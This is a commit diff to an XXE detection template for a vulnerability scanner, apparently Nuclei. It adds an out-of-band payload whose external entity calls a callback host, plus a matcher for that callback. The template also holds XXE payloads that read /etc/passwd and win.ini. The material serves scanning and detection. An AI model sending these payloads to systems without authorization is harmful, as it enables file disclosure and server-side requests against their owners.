Improve generic-xxe.yaml
parent
a558db64ad
commit
dd91ad9765
|
@ -2,7 +2,7 @@ id: generic-xxe
|
|||
|
||||
info:
|
||||
name: Generic XML external entity (XXE)
|
||||
author: pwnhxl
|
||||
author: pwnhxl, AmirHossein Raeisi
|
||||
severity: medium
|
||||
reference:
|
||||
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
|
||||
|
@ -23,6 +23,7 @@ http:
|
|||
xxe:
|
||||
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
|
||||
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
|
||||
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "http://{{interactsh-url}}"> ]><x>&{{rletter}};</x>'
|
||||
|
||||
fuzzing:
|
||||
- part: query
|
||||
|
@ -38,7 +39,6 @@ http:
|
|||
- "{{xxe}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
name: linux
|
||||
|
@ -51,4 +51,9 @@ http:
|
|||
part: body
|
||||
words:
|
||||
- 'for 16-bit app support'
|
||||
# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
|
||||
|
|
Loading…
Reference in New Issue